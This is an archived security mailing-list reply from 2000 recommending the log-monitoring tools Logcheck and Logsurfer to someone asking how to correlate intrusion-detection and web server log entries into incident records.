Logcheck will tail mmultiple logfiles with som pattern matching <ftp://ftp.cert.dfn.de/pub/tools/audit/logcheck/logcheck-1.01.tar.gz> Logsurfer - will only do one file at a time but with multiple contexts ( a context can be opened on a regexp match & continue collecting lines until a timeout , or report line X only if line Y doesn't get logged within a timeout) <http://www.cert.dfn.de/eng/logsurf/> -- Rafi Sadowsky rafiat_private Network/System/Security VoiceMail: +972-3-646-0592 FAX: +972-3-646-5410 Mangler ( :-) | member ILAN-CERT(CERTat_private) Open University of Israel | (PGP key -> ) http://telem.openu.ac.il/~rafi On Tue, 11 Jan 2000, Pete Storm wrote: > Hi all, > > Does anyone know of a tool out there that will allow > me to correlate incidents between several different > logs? For example, if I see an attempt to pull off a > php exploit on my IDS it stands to reason that I'll > see a similar log entry on my web server. What I'm > looking for is something that will pull these two > records out of the individual logs and place them in > an "incident" log as a related event. > > The current problem is that we're talking about > hundreds of thousands of log entries. Suppose I could > Perl it, but I was kinda hoping there might be a > commercial/shareware tool out there already that could > do it so much better than I could. > > thanks, > phs > __________________________________________________ > Do You Yahoo!? > Talk to your friends online with Yahoo! Messenger. > http://im.yahoo.com > >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:35 PDT